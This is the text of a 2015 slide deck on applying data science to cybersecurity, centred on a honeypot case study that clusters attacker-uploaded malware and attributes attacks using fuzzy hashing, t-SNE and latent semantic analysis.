applications of data science in cyber

Applications of Data Science in Cyber-Security

Richard Xiehttps://linkedin.com/in/richardxyJanuary 2015

What is Cyber-Security?

• A.K.A– computer security, network security

• Secure network assets from intrusions and data breaches

• Assets include:– servers, work stations, mobile devices

• Layers to secure:– Firewall, operating systems, files, credentials,

Why It's Important?http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Severe shortage of experts predicted

Cyber-Security + Data Science

Common Threats

• Exploitation of software volunerabilities• Fraud: spoofing, phishing, pharming • Malicious code (worms, viruses, spyware,

etc.)• dDos

How Data Science Would Help?

• Cyber-security is a big-data business– network logs– files– user-machine interactions– volume, velocity, variety, and veracity

• Data science is to be the engine to power next generation cyber-security solutions

Application Examples

• Spam email classification• Malware classification• Malicious IP classification• Intrusion detection• Network anomaly detection• Hacker attribution• and more...

A Real Case Study

• Hunting for Honeypot Attackers: A Data Scientist’s Adventure

• Honeynet is a set of honeypot systems deployed on internet

• Honeypot logs all hacking activities• Honeypot stores files uploaded by hackers• Malware used as hacker's weapons

Raw Statistics

• Data collection period– from March 2015 through the end of June

2015• >21k attacker IP address• 36 million SSH attempts• 34k unique usernames + 1 million

passwords being tried• 500 malicious domains and >1000 unique

malware being identified

Geo-location of Attacks

map_hacker_IP.py

Time Series of Attacks

time_series_activity.py

How raw data look like

Questions to Answer

• Clustering downloaded/crawled files to find file groups/categories

• attribution– association between attacks from different

days and IPs– where they came from

File Similarity Computation

• MD5 hash can't reflect slight changes in file

• Fuzzy hashing does• Using ssdeep, I computed pair-wise

similarity for all collected binary files and tar files

Steps to prepare data

• readRawData.py to create a collection "downloadsCollection"

• extract_crawled_file_to_mongo.py to create crawledFileCollection

• uniq_ip_count_MR.js to create uniqURLCollection

• uniq_ip_date_MR.js to create uniqURLDateCollection

• uniq_date_ip_MR.js to create uniqDateURLCollection

• uniq_hash_count_MR.js to create uniqFileCollection

• uniq_country_count_MR.js to create uniqCountryCollection

Graph of Files

two similar files have a connection, where similarity > 60% (for example)

identifySimilarDownloads.py from line 166

./graphiti demo graph_data/weighted_files2.json

Files -> Hacker

• a hacker may use same/similar tools on different days to hack systems

• File similarity matrix may provide hints on who were using those files

• treat date+IP as a unique attack, and all its associated binary files as its features

• construct a term matrix for all attacks

T-SNE on Attack-Malware Matrixwith K-Means Labeling

T-SNE: t-Distributed Stochastic Neighbor Embedding

get_similar_IPs.py from line 181

Latent Semantic Analysis

• LSA is widely used in NLP for topic finding• Analyzes relationships between a set of

documents and the terms they contain• Uses SVD to reduce number of

dimensions while maintaining record similarities

SVD: Singular Value Decomposition

Attacks Expressed with 1st and 2nd Principal Components

Each vector is a date+IP incident (a row in the term matrix)

Compute Similarities among Attacks• Similar attacks to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to

2015-03-23%%118.193.241.192, similarity 0.958453 2015-03-23%%222.186.190.157:56789, similarity 0.996835 2015-03-24%%222.186.190.157:56789, similarity 0.961000 2015-03-25%%117.21.176.79:333, similarity 0.997087 2015-03-25%%222.186.190.157:56789, similarity 0.946751 2015-06-17%%222.186.30.175:56789, similarity 0.996835 2015-06-17%%61.160.247.42:1988, similarity 0.996835 2015-06-18%%222.186.30.175:56789, similarity 0.996835 2015-06-18%%61.160.247.42:1988, similarity 0.996835

Time Series of Attack Counts for Group 1

Time Series of Attack Counts for Group 2

Visualization of Attack Graph

./graphiti demo graph_data/weighted_IPs_95percent.json

We know where they were from

python_map_IP_latlon.py

So what?

• The analysis may leads to– near-real-time attribution (it's a new attack, or

something we saw before?)– near-real-time triage of new malware or a

variant of existing ones?– more...

applications of data science in cyber

Documents

cyber-physical systems jeannette m. wing assistant director...

data science for cyber risk

managing e-science cyber-infrastructures: a case study

safeguarding applications from cyber attacks

department of defense: science of cyber-security

cinet: a cyber-infrastructure for network science overview

cyber security via signaling games: toward a science of...

cyber defense - annunciators as watcher for critical process...

cyber studies in computer science and information sciences

cyber security for energy applications - epri

science of security: cyber ecosystem attack analysis...

international master of science on cyber physical …

master of science (cyber security) programming in python

automotive cyber-physical security testbeds and...

b. pailthorpe, uq at ieee e-science, qut dec’10...

computer science and engineering (cyber security)

computer science for cyber security (pathway a) computer...

international centre for information & communication ... ·...

codehs ap computer science principles cyber course syllabus

rfid applications in cyber-physical system